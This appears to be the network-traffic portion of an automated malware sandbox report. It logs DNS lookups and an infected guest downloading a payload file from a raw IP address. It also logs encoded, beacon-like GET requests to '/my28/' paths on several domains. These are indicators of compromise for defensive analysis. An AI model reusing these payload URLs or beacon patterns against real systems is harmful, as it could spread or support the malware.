Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
www.immernochlustig.com | ||
www.ahmedhussein.tech |
CNAME
ahmedhussein.tech
|
84.32.84.32 |
www.ki-ror.se | 194.9.94.85 | |
www.davideal.com |
CNAME
traff-6.hugedomains.com
|
18.119.154.66 |
- UDP Requests
-
-
192.168.56.101:137 192.168.56.103:137
-
192.168.56.103:50800 164.124.101.2:53
-
192.168.56.103:52760 164.124.101.2:53
-
192.168.56.103:53673 164.124.101.2:53
-
192.168.56.103:62576 164.124.101.2:53
-
192.168.56.103:64894 164.124.101.2:53
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:49154 239.255.255.250:1900
-
8.8.8.8:53 192.168.56.103:50800
-
8.8.8.8:53 192.168.56.103:56613
-
8.8.8.8:53 192.168.56.103:62576
-
GET
200
http://172.245.214.178/007/Dblvvr.dat
REQUEST
RESPONSE
BODY
GET /007/Dblvvr.dat HTTP/1.1
Host: 172.245.214.178
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 26 Apr 2023 09:12:29 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
Last-Modified: Mon, 24 Apr 2023 15:29:09 GMT
ETag: "1562ac-5fa16ab08ccce"
Accept-Ranges: bytes
Content-Length: 1401516
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET
302
http://www.davideal.com/my28/?kFQl2H=g8afGKt5BcK8YWBpPCZ4/pxfgmmwdPBJ2VKmtBKY2hxTlxLpEHHrWffhk8WAXZeJbBDqIDJo&oX9=_0GXHXQPdFBhZ
REQUEST
RESPONSE
BODY
GET /my28/?kFQl2H=g8afGKt5BcK8YWBpPCZ4/pxfgmmwdPBJ2VKmtBKY2hxTlxLpEHHrWffhk8WAXZeJbBDqIDJo&oX9=_0GXHXQPdFBhZ HTTP/1.1
Host: www.davideal.com
Connection: close
HTTP/1.1 302 Found
content-length: 0
date: Wed, 26 Apr 2023 09:13:05 GMT
location: https://www.hugedomains.com/domain_profile.cfm?d=davideal.com
connection: close
GET
200
http://www.ki-ror.se/my28/?kFQl2H=4lfbIkXHco+fuMDhz2Un+xLdCLWdE3L2wwFDQBldcMLfj96ewRmoLvxyaijxNRtmHQY8ZyKd&oX9=_0GXHXQPdFBhZ
REQUEST
RESPONSE
BODY
GET /my28/?kFQl2H=4lfbIkXHco+fuMDhz2Un+xLdCLWdE3L2wwFDQBldcMLfj96ewRmoLvxyaijxNRtmHQY8ZyKd&oX9=_0GXHXQPdFBhZ HTTP/1.1
Host: www.ki-ror.se
Connection: close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 26 Apr 2023 09:13:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/8.1.17
GET
200
http://www.ahmedhussein.tech/my28/?kFQl2H=X1+ORJ0PqquAMwqRkudv2MXmW9g+6c2tmFrHnXo+N3P5UuIjhh51ghREFDJwWuIRTjSnOhJv&oX9=_0GXHXQPdFBhZ
REQUEST
RESPONSE
BODY
GET /my28/?kFQl2H=X1+ORJ0PqquAMwqRkudv2MXmW9g+6c2tmFrHnXo+N3P5UuIjhh51ghREFDJwWuIRTjSnOhJv&oX9=_0GXHXQPdFBhZ HTTP/1.1
Host: www.ahmedhussein.tech
Connection: close
HTTP/1.1 200 OK
Server: hcdn
Date: Wed, 26 Apr 2023 09:14:06 GMT
Content-Type: text/html
Content-Length: 10066
Connection: close
Vary: Accept-Encoding
x-hcdn-request-id: 9e8dfbb1ce23bac118a67094e3b8eb11-fast-edge1
Expires: Wed, 26 Apr 2023 09:14:05 GMT
Cache-Control: no-cache
Accept-Ranges: bytes
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.103 | 164.124.101.2 | 3 | |
192.168.56.103 | 164.124.101.2 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts